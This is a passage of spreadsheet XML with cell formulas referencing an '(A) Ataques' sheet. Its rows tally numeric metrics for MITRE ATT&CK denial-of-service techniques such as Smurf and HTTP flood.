        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!BF63,"")</f>
        <v>0</v>
      </c>
      <c r="I63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!BG63,"")</f>
        <v>0</v>
      </c>
      <c r="J63" s="530">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($F63=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BH63,"")</f>
        <v>0</v>
      </c>
      <c r="L63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BJ63,"")</f>
        <v>0</v>
      </c>
      <c r="M63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BL63,"")</f>
        <v>0</v>
      </c>
      <c r="N63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BM63,"")</f>
        <v>0</v>
      </c>
      <c r="O63" s="532">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($K63=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P63" s="292">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BN63,"")</f>
        <v>0</v>
      </c>
      <c r="Q63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BP63,"")</f>
        <v>0</v>
      </c>
      <c r="R63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BR63,"")</f>
        <v>0</v>
      </c>
      <c r="S63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BS63,"")</f>
        <v>0</v>
      </c>
      <c r="T63" s="530">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($P63=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BT63,"")</f>
        <v>12</v>
      </c>
      <c r="V63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BV63,"")</f>
        <v>1</v>
      </c>
      <c r="W63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BX63,"")</f>
        <v>1</v>
      </c>
      <c r="X63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$BY63,"")</f>
        <v>1</v>
      </c>
      <c r="Y63" s="532">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($U63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z63" s="288">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!BZ63,"")</f>
        <v>16</v>
      </c>
      <c r="AA63" s="392">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!CB63,"")</f>
        <v>5</v>
      </c>
      <c r="AB63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!CD63,"")</f>
        <v>3</v>
      </c>
      <c r="AC63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!CE63,"")</f>
        <v>2</v>
      </c>
      <c r="AD63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF(Z63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CF63,"")</f>
        <v>28</v>
      </c>
      <c r="AF63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CH63,"")</f>
        <v>6</v>
      </c>
      <c r="AG63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CJ63,"")</f>
        <v>4</v>
      </c>
      <c r="AH63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CK63,"")</f>
        <v>2</v>
      </c>
      <c r="AI63" s="287">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($AE63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ63" s="292">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CL63,"")</f>
        <v>0</v>
      </c>
      <c r="AK63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CN63,"")</f>
        <v>0</v>
      </c>
      <c r="AL63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CP63,"")</f>
        <v>0</v>
      </c>
      <c r="AM63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CQ63,"")</f>
        <v>0</v>
      </c>
      <c r="AN63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($AJ63=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CR63,"")</f>
        <v>12</v>
      </c>
      <c r="AP63" s="322">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CT63,"")</f>
        <v>1</v>
      </c>
      <c r="AQ63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CV63,"")</f>
        <v>1</v>
      </c>
      <c r="AR63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!$CW63,"")</f>
        <v>1</v>
      </c>
      <c r="AS63" s="287">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($AO63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT63" s="288">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!CX63,"")</f>
        <v>12</v>
      </c>
      <c r="AU63" s="392">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!CZ63,"")</f>
        <v>1</v>
      </c>
      <c r="AV63" s="4">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!DB63,"")</f>
        <v>1</v>
      </c>
      <c r="AW63" s="20">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",'(A) Ataques'!DC63,"")</f>
        <v>1</v>
      </c>
      <c r="AX63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($AT63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY63" s="469">
        <f>'(A) Ataques'!LU63+'(A) Ataques'!MA63+'(A) Ataques'!MG63+'(A) Ataques'!MM63+'(A) Ataques'!MS63</f>
        <v>0</v>
      </c>
      <c r="AZ63" s="510">
        <f>'(A) Ataques'!LW63+'(A) Ataques'!MC63+'(A) Ataques'!MI63+'(A) Ataques'!MO63+'(A) Ataques'!MU63</f>
        <v>0</v>
      </c>
      <c r="BA63" s="471">
        <f>'(A) Ataques'!LY63+'(A) Ataques'!ME63+'(A) Ataques'!MK63+'(A) Ataques'!MQ63+'(A) Ataques'!MW63</f>
        <v>0</v>
      </c>
      <c r="BB63" s="471">
        <f>'(A) Ataques'!LQ63</f>
        <v>0</v>
      </c>
      <c r="BC63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($AY63=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD63" s="469">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!LL63,"")</f>
        <v>12</v>
      </c>
      <c r="BE63" s="510">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!LM63,"")</f>
        <v>1</v>
      </c>
      <c r="BF63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!LN63,"")</f>
        <v>0</v>
      </c>
      <c r="BG63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!LO63,"")</f>
        <v>1</v>
      </c>
      <c r="BH63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!LS63,"")</f>
        <v>1</v>
      </c>
      <c r="BI63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($BD63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ63" s="469">
        <f>'(A) Ataques'!OL63+'(A) Ataques'!OR63+'(A) Ataques'!OX63+'(A) Ataques'!PD63+'(A) Ataques'!PJ63</f>
        <v>1</v>
      </c>
      <c r="BK63" s="510">
        <f>'(A) Ataques'!ON63+'(A) Ataques'!OT63+'(A) Ataques'!OZ63+'(A) Ataques'!PF63+'(A) Ataques'!PL63</f>
        <v>1</v>
      </c>
      <c r="BL63" s="471">
        <f>'(A) Ataques'!OP63+'(A) Ataques'!OV63+'(A) Ataques'!PB63+'(A) Ataques'!PH63+'(A) Ataques'!PN63</f>
        <v>1</v>
      </c>
      <c r="BM63" s="495">
        <f>'(A) Ataques'!OH63</f>
        <v>1</v>
      </c>
      <c r="BN63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($BJ63=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO63" s="469">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!OC63,"")</f>
        <v>1</v>
      </c>
      <c r="BP63" s="510">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!OD63,"")</f>
        <v>1</v>
      </c>
      <c r="BQ63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!OE63,"")</f>
        <v>1</v>
      </c>
      <c r="BR63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!OF63,"")</f>
        <v>1</v>
      </c>
      <c r="BS63" s="471">
        <f>IF('(A) Ataques'!$AP63&lt;&gt;"NO",'(A) Ataques'!OJ63,"")</f>
        <v>1</v>
      </c>
      <c r="BT63" s="331">
        <f>IF('(A) Ataques'!$AK63&lt;&gt;"NO",IF($BO63=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A64" s="79">
        <f t="shared" si="0"/>
        <v>62</v>
      </c>
      <c r="B64" s="4">
        <f>IF('(A) Ataques'!AK64&lt;&gt;"NO",'(A) Ataques'!E64,"")</f>
        <v>47</v>
      </c>
      <c r="C64" s="474" t="str">
        <f>IF('(A) Ataques'!AK64&lt;&gt;"NO",IF('(A) Ataques'!M64="","",'(A) Ataques'!M64),"")</f>
        <v>T1498.002-Smurf</v>
      </c>
      <c r="D64" s="4" t="str">
        <f>IF('(A) Ataques'!AK64&lt;&gt;"NO",'(A) Ataques'!F64,"")</f>
        <v>T1498</v>
      </c>
      <c r="E64" s="476">
        <f>IF('(A) Ataques'!AK64&lt;&gt;"NO",'(A) Ataques'!AQ64,"")</f>
        <v>3</v>
      </c>
      <c r="F64" s="288">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!BB64,"")</f>
        <v>0</v>
      </c>
      <c r="G64" s="392">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!BD64,"")</f>
        <v>0</v>
      </c>
      <c r="H64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!BF64,"")</f>
        <v>0</v>
      </c>
      <c r="I64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!BG64,"")</f>
        <v>0</v>
      </c>
      <c r="J64" s="530">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($F64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BH64,"")</f>
        <v>0</v>
      </c>
      <c r="L64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BJ64,"")</f>
        <v>0</v>
      </c>
      <c r="M64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BL64,"")</f>
        <v>0</v>
      </c>
      <c r="N64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BM64,"")</f>
        <v>0</v>
      </c>
      <c r="O64" s="532">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($K64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P64" s="292">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BN64,"")</f>
        <v>0</v>
      </c>
      <c r="Q64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BP64,"")</f>
        <v>0</v>
      </c>
      <c r="R64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BR64,"")</f>
        <v>0</v>
      </c>
      <c r="S64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BS64,"")</f>
        <v>0</v>
      </c>
      <c r="T64" s="530">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($P64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U64" s="475">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BT64,"")</f>
        <v>1002</v>
      </c>
      <c r="V64" s="475">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BV64,"")</f>
        <v>1</v>
      </c>
      <c r="W64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BX64,"")</f>
        <v>1</v>
      </c>
      <c r="X64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$BY64,"")</f>
        <v>1</v>
      </c>
      <c r="Y64" s="532">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($U64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z64" s="288">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!BZ64,"")</f>
        <v>1005</v>
      </c>
      <c r="AA64" s="392">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!CB64,"")</f>
        <v>4</v>
      </c>
      <c r="AB64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!CD64,"")</f>
        <v>4</v>
      </c>
      <c r="AC64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!CE64,"")</f>
        <v>2</v>
      </c>
      <c r="AD64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF(Z64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CF64,"")</f>
        <v>2007</v>
      </c>
      <c r="AF64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CH64,"")</f>
        <v>5</v>
      </c>
      <c r="AG64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CJ64,"")</f>
        <v>5</v>
      </c>
      <c r="AH64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CK64,"")</f>
        <v>2</v>
      </c>
      <c r="AI64" s="287">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($AE64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ64" s="292">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CL64,"")</f>
        <v>0</v>
      </c>
      <c r="AK64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CN64,"")</f>
        <v>0</v>
      </c>
      <c r="AL64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CP64,"")</f>
        <v>0</v>
      </c>
      <c r="AM64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CQ64,"")</f>
        <v>0</v>
      </c>
      <c r="AN64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($AJ64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CR64,"")</f>
        <v>1002</v>
      </c>
      <c r="AP64" s="322">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CT64,"")</f>
        <v>1</v>
      </c>
      <c r="AQ64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CV64,"")</f>
        <v>1</v>
      </c>
      <c r="AR64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!$CW64,"")</f>
        <v>1</v>
      </c>
      <c r="AS64" s="287">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($AO64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT64" s="288">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!CX64,"")</f>
        <v>1002</v>
      </c>
      <c r="AU64" s="392">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!CZ64,"")</f>
        <v>1</v>
      </c>
      <c r="AV64" s="4">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!DB64,"")</f>
        <v>1</v>
      </c>
      <c r="AW64" s="20">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",'(A) Ataques'!DC64,"")</f>
        <v>1</v>
      </c>
      <c r="AX64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($AT64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY64" s="469">
        <f>'(A) Ataques'!LU64+'(A) Ataques'!MA64+'(A) Ataques'!MG64+'(A) Ataques'!MM64+'(A) Ataques'!MS64</f>
        <v>0</v>
      </c>
      <c r="AZ64" s="510">
        <f>'(A) Ataques'!LW64+'(A) Ataques'!MC64+'(A) Ataques'!MI64+'(A) Ataques'!MO64+'(A) Ataques'!MU64</f>
        <v>0</v>
      </c>
      <c r="BA64" s="471">
        <f>'(A) Ataques'!LY64+'(A) Ataques'!ME64+'(A) Ataques'!MK64+'(A) Ataques'!MQ64+'(A) Ataques'!MW64</f>
        <v>0</v>
      </c>
      <c r="BB64" s="471">
        <f>'(A) Ataques'!LQ64</f>
        <v>0</v>
      </c>
      <c r="BC64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($AY64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD64" s="469">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!LL64,"")</f>
        <v>3</v>
      </c>
      <c r="BE64" s="510">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!LM64,"")</f>
        <v>3</v>
      </c>
      <c r="BF64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!LN64,"")</f>
        <v>0</v>
      </c>
      <c r="BG64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!LO64,"")</f>
        <v>3</v>
      </c>
      <c r="BH64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!LS64,"")</f>
        <v>3</v>
      </c>
      <c r="BI64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($BD64=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ64" s="469">
        <f>'(A) Ataques'!OL64+'(A) Ataques'!OR64+'(A) Ataques'!OX64+'(A) Ataques'!PD64+'(A) Ataques'!PJ64</f>
        <v>0</v>
      </c>
      <c r="BK64" s="510">
        <f>'(A) Ataques'!ON64+'(A) Ataques'!OT64+'(A) Ataques'!OZ64+'(A) Ataques'!PF64+'(A) Ataques'!PL64</f>
        <v>0</v>
      </c>
      <c r="BL64" s="471">
        <f>'(A) Ataques'!OP64+'(A) Ataques'!OV64+'(A) Ataques'!PB64+'(A) Ataques'!PH64+'(A) Ataques'!PN64</f>
        <v>0</v>
      </c>
      <c r="BM64" s="495">
        <f>'(A) Ataques'!OH64</f>
        <v>0</v>
      </c>
      <c r="BN64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($BJ64=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO64" s="469">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!OC64,"")</f>
        <v>0</v>
      </c>
      <c r="BP64" s="510">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!OD64,"")</f>
        <v>0</v>
      </c>
      <c r="BQ64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!OE64,"")</f>
        <v>0</v>
      </c>
      <c r="BR64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!OF64,"")</f>
        <v>0</v>
      </c>
      <c r="BS64" s="471">
        <f>IF('(A) Ataques'!$AP64&lt;&gt;"NO",'(A) Ataques'!OJ64,"")</f>
        <v>0</v>
      </c>
      <c r="BT64" s="331">
        <f>IF('(A) Ataques'!$AK64&lt;&gt;"NO",IF($BO64=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A65" s="79">
        <f t="shared" si="0"/>
        <v>63</v>
      </c>
      <c r="B65" s="4">
        <f>IF('(A) Ataques'!AK65&lt;&gt;"NO",'(A) Ataques'!E65,"")</f>
        <v>47</v>
      </c>
      <c r="C65" s="474" t="str">
        <f>IF('(A) Ataques'!AK65&lt;&gt;"NO",IF('(A) Ataques'!M65="","",'(A) Ataques'!M65),"")</f>
        <v>T1498.001-HTTP_flood</v>
      </c>
      <c r="D65" s="4" t="str">
        <f>IF('(A) Ataques'!AK65&lt;&gt;"NO",'(A) Ataques'!F65,"")</f>
        <v>T1498</v>
      </c>
      <c r="E65" s="476">
        <f>IF('(A) Ataques'!AK65&lt;&gt;"NO",'(A) Ataques'!AQ65,"")</f>
        <v>289328</v>
      </c>
      <c r="F65" s="288">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!BB65,"")</f>
        <v>249</v>
      </c>
      <c r="G65" s="392">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!BD65,"")</f>
        <v>249</v>
      </c>
      <c r="H65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!BF65,"")</f>
        <v>1</v>
      </c>
      <c r="I65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!BG65,"")</f>
        <v>249</v>
      </c>
      <c r="J65" s="530">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($F65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BH65,"")</f>
        <v>63</v>
      </c>
      <c r="L65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BJ65,"")</f>
        <v>63</v>
      </c>
      <c r="M65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BL65,"")</f>
        <v>1</v>
      </c>
      <c r="N65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BM65,"")</f>
        <v>63</v>
      </c>
      <c r="O65" s="532">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($K65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P65" s="292">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BN65,"")</f>
        <v>312</v>
      </c>
      <c r="Q65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BP65,"")</f>
        <v>312</v>
      </c>
      <c r="R65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BR65,"")</f>
        <v>2</v>
      </c>
      <c r="S65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BS65,"")</f>
        <v>312</v>
      </c>
      <c r="T65" s="530">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($P65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U65" s="475">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BT65,"")</f>
        <v>249</v>
      </c>
      <c r="V65" s="475">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BV65,"")</f>
        <v>249</v>
      </c>
      <c r="W65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BX65,"")</f>
        <v>1</v>
      </c>
      <c r="X65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$BY65,"")</f>
        <v>249</v>
      </c>
      <c r="Y65" s="532">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($U65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z65" s="288">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!BZ65,"")</f>
        <v>173</v>
      </c>
      <c r="AA65" s="392">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!CB65,"")</f>
        <v>173</v>
      </c>
      <c r="AB65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!CD65,"")</f>
        <v>2</v>
      </c>
      <c r="AC65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!CE65,"")</f>
        <v>173</v>
      </c>
      <c r="AD65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF(Z65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CF65,"")</f>
        <v>422</v>
      </c>
      <c r="AF65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CH65,"")</f>
        <v>422</v>
      </c>
      <c r="AG65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CJ65,"")</f>
        <v>3</v>
      </c>
      <c r="AH65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CK65,"")</f>
        <v>422</v>
      </c>
      <c r="AI65" s="287">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($AE65=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ65" s="292">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CL65,"")</f>
        <v>0</v>
      </c>
      <c r="AK65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CN65,"")</f>
        <v>0</v>
      </c>
      <c r="AL65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CP65,"")</f>
        <v>0</v>
      </c>
      <c r="AM65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CQ65,"")</f>
        <v>0</v>
      </c>
      <c r="AN65" s="331">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($AJ65=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CR65,"")</f>
        <v>0</v>
      </c>
      <c r="AP65" s="322">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CT65,"")</f>
        <v>0</v>
      </c>
      <c r="AQ65" s="4">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CV65,"")</f>
        <v>0</v>
      </c>
      <c r="AR65" s="20">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!$CW65,"")</f>
        <v>0</v>
      </c>
      <c r="AS65" s="287">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",IF($AO65=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT65" s="288">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!CX65,"")</f>
        <v>312</v>
      </c>
      <c r="AU65" s="392">
        <f>IF('(A) Ataques'!$AK65&lt;&gt;"NO",'(A) Ataques'!CZ65,"")</f>
        <v>312</v>
      </c>
      <c r="AV65" s="4">
